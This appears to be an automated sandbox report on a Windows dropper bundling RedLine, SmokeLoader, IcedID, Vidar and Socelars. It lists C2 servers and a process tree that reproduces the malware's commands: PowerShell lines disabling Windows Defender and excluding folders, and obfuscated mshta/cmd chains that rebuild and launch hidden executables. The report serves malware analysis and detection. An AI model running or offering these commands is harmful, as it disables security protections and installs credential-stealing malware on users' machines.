Resubmissions
27-10-2021 12:55
211027-p592qaegd7 1027-10-2021 05:03
211027-fpnzwaaff8 1026-10-2021 14:24
211026-rqs6rshff8 10Analysis
-
max time kernel
42s -
max time network
1816s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
27-10-2021 05:03
General
-
Target
setup_x86_x64_install.exe
-
Size
5.6MB
-
MD5
8dfefd1f56f2ac4f1869d86edbb4aa8f
-
SHA1
3a65b0920890fd7e8ae751ee15f76de281584010
-
SHA256
433e51a49b84a52cd5f740a12ec46a145d3c14a95e529d4ef32fd250e02829ed
-
SHA512
996a84df42b79c8786f4347b875621a476bd6a0e71d4c61fd47a726fb9f6717051d03d8b381233e7966c1a2150628b8b7986727298a6fc803aea504f96fd934c
Score
10/10
Malware Config
Extracted
Family
redline
Botnet
media25
C2
91.121.67.60:23325
Extracted
Family
redline
Botnet
ChrisNEW
C2
194.104.136.5:46013
Extracted
Family
smokeloader
Version
2020
C2
http://brandyjaggers.com/upload/
http://andbal.com/upload/
http://alotofquotes.com/upload/
http://szpnc.cn/upload/
http://uggeboots.com/upload/
http://100klv.com/upload/
http://rapmusic.at/upload/
rc4.i32
rc4.i32
Extracted
Family
icedid
Campaign
1976347518
Signatures
-
IcedID, BokBot
IcedID is a banking trojan capable of stealing credentials.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 5 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
ASPack v2.12-2.42 7 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Downloads MZ/PE file
-
Executes dropped EXE 32 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 10 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 14 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of SetThreadContext 3 IoCs
-
autoit_exe 4 IoCs
AutoIT scripts compiled to PE executables.
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 14 IoCs
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Kills process with taskkill 6 IoCs
-
Modifies Internet Explorer settings 1 TTPs 2 IoCs
-
Modifies registry class 64 IoCs
-
Modifies system certificate store 2 TTPs 4 IoCs
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 29 IoCs
-
Suspicious use of SendNotifyMessage 27 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC15F34E5\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC15F34E5\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0985edbf92e08954.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC15F34E5\Tue0985edbf92e08954.exeTue0985edbf92e08954.exe5⤵
- Executes dropped EXE
-
C:\ProgramData\3063620.exe"C:\ProgramData\3063620.exe"6⤵
- Executes dropped EXE
-
-
C:\ProgramData\801885.exe"C:\ProgramData\801885.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
-
-
-
C:\ProgramData\6664024.exe"C:\ProgramData\6664024.exe"6⤵
- Executes dropped EXE
-
-
C:\ProgramData\4616569.exe"C:\ProgramData\4616569.exe"6⤵
- Executes dropped EXE
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09c257807a702a4.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC15F34E5\Tue09c257807a702a4.exeTue09c257807a702a4.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 16646⤵
- Program crash
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue097328c1b990.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC15F34E5\Tue097328c1b990.exeTue097328c1b990.exe5⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0978af55b9.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC15F34E5\Tue0978af55b9.exeTue0978af55b9.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09a30919dc5f00.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC15F34E5\Tue09a30919dc5f00.exeTue09a30919dc5f00.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscrIPT: CLosE( creatEobjeCt ( "WSCRIpt.Shell" ). RUN ( "C:\Windows\system32\cmd.exe /R TYPe ""C:\Users\Admin\AppData\Local\Temp\7zSC15F34E5\Tue09a30919dc5f00.exe"" > ..\WG1uEEN.EXe && StarT ..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u86 & If """" == """" for %b In (""C:\Users\Admin\AppData\Local\Temp\7zSC15F34E5\Tue09a30919dc5f00.exe"" ) do taskkill /f /iM ""%~Nxb"" " , 0 , TRUe ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R TYPe "C:\Users\Admin\AppData\Local\Temp\7zSC15F34E5\Tue09a30919dc5f00.exe" > ..\WG1uEEN.EXe && StarT ..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u86 & If "" == "" for %b In ("C:\Users\Admin\AppData\Local\Temp\7zSC15F34E5\Tue09a30919dc5f00.exe" ) do taskkill /f /iM "%~Nxb"7⤵
-
C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u868⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscrIPT: CLosE( creatEobjeCt ( "WSCRIpt.Shell" ). RUN ( "C:\Windows\system32\cmd.exe /R TYPe ""C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe"" > ..\WG1uEEN.EXe && StarT ..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u86 & If ""-PhwqM9LteEkjDz5gZPyhw9N49u86 "" == """" for %b In (""C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe"" ) do taskkill /f /iM ""%~Nxb"" " , 0 , TRUe ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R TYPe "C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe" > ..\WG1uEEN.EXe && StarT ..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u86 & If "-PhwqM9LteEkjDz5gZPyhw9N49u86 " == "" for %b In ("C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe" ) do taskkill /f /iM "%~Nxb"10⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscrIpT: cloSE ( cREateObJEct ( "wsCRipt.SheLl" ). rUn ( "Cmd.exe /q /R ecHo | sEt /P = ""MZ"" > ~dWBNpV.F & Copy /b /y ~dWbNpV.F + YsLNPQ.k + 9Jd86KPL.RS + 6VTZU.XA8+CQ3X0._ + 3hAXC.X ..\2GBhNGG.N &sTaRt msiexec.exe /y ..\2GbhNGG.n & DEl /Q * " , 0, TRue ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /R ecHo | sEt /P = "MZ" > ~dWBNpV.F & Copy /b /y ~dWbNpV.F + YsLNPQ.k + 9Jd86KPL.RS + 6VTZU.XA8+CQ3X0._ + 3hAXC.X ..\2GBhNGG.N &sTaRt msiexec.exe /y ..\2GbhNGG.n & DEl /Q *10⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ecHo "11⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>~dWBNpV.F"11⤵
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /y ..\2GbhNGG.n11⤵
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /iM "Tue09a30919dc5f00.exe"8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09c1731fe55c7.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC15F34E5\Tue09c1731fe55c7.exeTue09c1731fe55c7.exe5⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09786995c7f02a923.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC15F34E5\Tue09786995c7f02a923.exeTue09786995c7f02a923.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\1597820053.exe"6⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\7797186443.exe"6⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Tue09786995c7f02a923.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSC15F34E5\Tue09786995c7f02a923.exe" & exit6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Tue09786995c7f02a923.exe" /f7⤵
- Kills process with taskkill
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09792fda06e.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC15F34E5\Tue09792fda06e.exeTue09792fda06e.exe5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09264824c4.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC15F34E5\Tue09264824c4.exeTue09264824c4.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\v0HMbmZIIxSKqDHPjIMjbzUb.exe"C:\Users\Admin\Pictures\Adobe Films\v0HMbmZIIxSKqDHPjIMjbzUb.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\3G7d6MLDlnSUavgFpwzAD05t.exe"C:\Users\Admin\Pictures\Adobe Films\3G7d6MLDlnSUavgFpwzAD05t.exe"6⤵
-
C:\Users\Admin\Documents\0DSn2szK1pIwaelBU0UmaYM8.exe"C:\Users\Admin\Documents\0DSn2szK1pIwaelBU0UmaYM8.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\vxbR9zFzl6PtiX6WK1P1RiMy.exe"C:\Users\Admin\Pictures\Adobe Films\vxbR9zFzl6PtiX6WK1P1RiMy.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\dYhRWdyFyci5bcamVzrO7sDY.exe"C:\Users\Admin\Pictures\Adobe Films\dYhRWdyFyci5bcamVzrO7sDY.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\whx3QtPYzxy_QI_hNCAhOx2l.exe"C:\Users\Admin\Pictures\Adobe Films\whx3QtPYzxy_QI_hNCAhOx2l.exe"8⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\3sVfE1vEgeUuwUKkyfumjh8M.exe"C:\Users\Admin\Pictures\Adobe Films\3sVfE1vEgeUuwUKkyfumjh8M.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\9kHev5pl9KQu5ThIP4MLqwRC.exe"C:\Users\Admin\Pictures\Adobe Films\9kHev5pl9KQu5ThIP4MLqwRC.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\31O3bOAOr9DKkNYhrxEkoH0S.exe"C:\Users\Admin\Pictures\Adobe Films\31O3bOAOr9DKkNYhrxEkoH0S.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\31O3bOAOr9DKkNYhrxEkoH0S.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\31O3bOAOr9DKkNYhrxEkoH0S.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\31O3bOAOr9DKkNYhrxEkoH0S.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\31O3bOAOr9DKkNYhrxEkoH0S.exe" ) do taskkill -f -iM "%~NxM"10⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"13⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"14⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "14⤵
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC14⤵
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "31O3bOAOr9DKkNYhrxEkoH0S.exe"11⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\8opDN14yroIo3NvR2X9Fl_ca.exe"C:\Users\Admin\Pictures\Adobe Films\8opDN14yroIo3NvR2X9Fl_ca.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\8opDN14yroIo3NvR2X9Fl_ca.exe"C:\Users\Admin\Pictures\Adobe Films\8opDN14yroIo3NvR2X9Fl_ca.exe" -u9⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\tpg3g0UczzSRfGGpRx1PgvTK.exe"C:\Users\Admin\Pictures\Adobe Films\tpg3g0UczzSRfGGpRx1PgvTK.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-61DAN.tmp\tpg3g0UczzSRfGGpRx1PgvTK.tmp"C:\Users\Admin\AppData\Local\Temp\is-61DAN.tmp\tpg3g0UczzSRfGGpRx1PgvTK.tmp" /SL5="$1035E,506127,422400,C:\Users\Admin\Pictures\Adobe Films\tpg3g0UczzSRfGGpRx1PgvTK.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-C1Q4A.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-C1Q4A.tmp\DYbALA.exe" /S /UID=270910⤵
-
C:\Program Files\7-Zip\CKRSXBHGJQ\foldershare.exe"C:\Program Files\7-Zip\CKRSXBHGJQ\foldershare.exe" /VERYSILENT11⤵
-
-
C:\Users\Admin\AppData\Local\Temp\d5-7286d-fb8-515bb-aa47e85f4b519\Lishopaelebo.exe"C:\Users\Admin\AppData\Local\Temp\d5-7286d-fb8-515bb-aa47e85f4b519\Lishopaelebo.exe"11⤵
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 265212⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\c1-35dfd-b83-681ac-3069f7746b3b4\Tushanuzhobe.exe"C:\Users\Admin\AppData\Local\Temp\c1-35dfd-b83-681ac-3069f7746b3b4\Tushanuzhobe.exe"11⤵
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\otjkvk1z.jll\setting.exe SID=778 CID=778 SILENT=1 /quiet & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\otjkvk1z.jll\setting.exeC:\Users\Admin\AppData\Local\Temp\otjkvk1z.jll\setting.exe SID=778 CID=778 SILENT=1 /quiet13⤵
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Settings\Settings 1.0.0\install\FD7DF1F\Settings Installation.msi" SID=778 CID=778 SILENT=1 /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\otjkvk1z.jll\setting.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\otjkvk1z.jll\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1635051632 SID=778 CID=778 SILENT=1 /quiet " SID="778" CID="778"14⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1ceygs3x.jkh\GcleanerEU.exe /eufive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\1ceygs3x.jkh\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\1ceygs3x.jkh\GcleanerEU.exe /eufive13⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ot33low3.bkq\installer.exe /qn CAMPAIGN="654" & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\ot33low3.bkq\installer.exeC:\Users\Admin\AppData\Local\Temp\ot33low3.bkq\installer.exe /qn CAMPAIGN="654"13⤵
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ot33low3.bkq\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ot33low3.bkq\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1635051632 /qn CAMPAIGN=""654"" " CAMPAIGN="654"14⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qiookzuy.d5d\any.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\qiookzuy.d5d\any.exeC:\Users\Admin\AppData\Local\Temp\qiookzuy.d5d\any.exe13⤵
-
C:\Users\Admin\AppData\Local\Temp\qiookzuy.d5d\any.exe"C:\Users\Admin\AppData\Local\Temp\qiookzuy.d5d\any.exe" -u14⤵
- Loads dropped DLL
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3dm1aety.5ki\customer51.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\3dm1aety.5ki\customer51.exeC:\Users\Admin\AppData\Local\Temp\3dm1aety.5ki\customer51.exe13⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ctdpdoq2.r4b\gcleaner.exe /mixfive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\ctdpdoq2.r4b\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\ctdpdoq2.r4b\gcleaner.exe /mixfive13⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\z3jo2mtn.ozg\autosubplayer.exe /S & exit12⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dxxywd05.l34\installer.exe /qn CAMPAIGN=654 & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\dxxywd05.l34\installer.exeC:\Users\Admin\AppData\Local\Temp\dxxywd05.l34\installer.exe /qn CAMPAIGN=65413⤵
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\zDtFN77p6ubuyr92Pk96hP4q.exe"C:\Users\Admin\Pictures\Adobe Films\zDtFN77p6ubuyr92Pk96hP4q.exe"8⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=19⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"10⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1f8,0x1fc,0x200,0x1d4,0x204,0x7ff99715dec0,0x7ff99715ded0,0x7ff99715dee011⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1704,16901904395509383887,11355396258001114189,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6340_1893534847" --mojo-platform-channel-handle=2024 /prefetch:811⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1704,16901904395509383887,11355396258001114189,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6340_1893534847" --mojo-platform-channel-handle=1816 /prefetch:811⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1704,16901904395509383887,11355396258001114189,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6340_1893534847" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1764 /prefetch:211⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1704,16901904395509383887,11355396258001114189,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6340_1893534847" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2620 /prefetch:111⤵
-
-
